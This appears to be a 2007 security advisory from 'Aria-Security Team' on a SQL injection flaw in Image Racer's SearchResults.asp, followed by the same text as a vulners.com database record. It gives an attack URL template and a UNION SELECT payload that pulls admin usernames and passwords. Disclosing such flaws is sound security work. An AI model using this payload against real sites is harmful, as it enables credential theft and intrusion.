Description
__________________
Aria-Security Team
__________________
Image Racer SearchResults.asp SQL Injection
Vendor: http://www.junctionquest.com/Software.asp
Example:
http://www.TARGET.com/SearchResults.asp?SearchWord=[SQL COMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0
Example :
-1 'union select username,password from admin where [FIND IT YOUR SELF]=1
------------------------------------------------
Credits: Aria-Security Team
http://aria-security.net/
Personal Blog: http://outlaw.aria-security.info
{"id": "SECURITYVULNS:DOC:17578", "bulletinFamily": "software", "title": "[Aria-Security] Image Racer SearchResults.asp SQL INJECTION vuln.", "description": "__________________\r\n\r\nAria-Security Team\r\n__________________\r\n\r\nImage Racer SearchResults.asp SQL Injection\r\nVendor: http://www.junctionquest.com/Software.asp\r\n\r\nExample:\r\nhttp://www.TARGET.com/SearchResults.asp?SearchWord=[SQL COMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0\r\n\r\nExample :\r\n-1 'union select username,password from admin where [FIND IT YOUR SELF]=1\r\n\r\n------------------------------------------------\r\nCredits: Aria-Security Team \r\nhttp://aria-security.net/\r\nPersonal Blog: http://outlaw.aria-security.info", "published": "2007-07-23T00:00:00", "modified": "2007-07-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17578", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:22", "edition": 1, "viewCount": 118, "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7963"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7963"]}]}, "exploitation": null, "vulnersScore": 0.7}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645380076, "score": 1659803227}, "_internal": {"score_hash": "c514f551fb1fa906c692014db8d32a54"}}
{}